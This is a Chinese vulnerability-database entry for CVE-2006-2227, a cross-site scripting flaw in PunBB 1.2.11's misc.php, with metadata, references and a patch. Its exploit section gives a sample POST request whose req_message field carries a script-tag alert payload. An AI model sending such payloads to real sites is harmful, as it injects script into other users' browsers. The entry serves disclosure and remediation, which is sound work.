PunBB misc.php 跨站脚本攻击(XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195105 漏洞类型 跨站脚本
发布时间 2006-05-05 更新时间 2006-05-09
CVE编号 CVE-2006-2227 CNNVD-ID CNNVD-200605-105
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-105
|漏洞详情
PunBB1.2.11的misc.php存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助req_message参数注入任意Web脚本或HTML,因为redirect_url参数未清理。
|漏洞EXP
PunBB	1.2.11 Cross-Site Scripting

File name :- misc.php

Action    :- Send Email

Line      :- 123

[php]

redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']);

[/php]

The $_POST['redirect_url'] = Unfilter Input

Exploit :-

Send POST Request

[code]

GET :-

/PunBB/misc.php?email=2

POST :-

form_sent=1&redirect_url=index.php&req_subject=test&req_message=test"><s
cript>alert(1);</script>

[/code]

Fix :-

Replace The Line With :-

[php]

redirect(htmlspecialchars($_POST['redirect_url']), $lang_misc['E-mail sent redirect']);

[/php]
|参考资料

来源:BUGTRAQ
名称:20060503PunBB1.2.11Cross-SiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/432950/100/0/threaded
来源:SECUNIA
名称:19986
链接:http://secunia.com/advisories/19986
来源:XF
名称:punbb-misc-xss(26245)
链接:http://xforce.iss.net/xforce/xfdb/26245
来源:BID
名称:17827
链接:http://www.securityfocus.com/bid/17827
来源:www.punbb.org
链接:http://www.punbb.org/download/hdiff/hdiff-1.2.11_to_1.2.12.html
来源:www.punbb.org
链接:http://www.punbb.org/changelogs/1.2.11_to_1.2.12.txt
来源:OSVDB
名称:25256
链接:http://www.osvdb.org/25256
来源:VUPEN
名称:ADV-2006-1670
链接:http://www.frsirt.com/english/advisories/2006/1670
来源:SREASON
名称:849
链接:http://securityreason.com/securityalert/849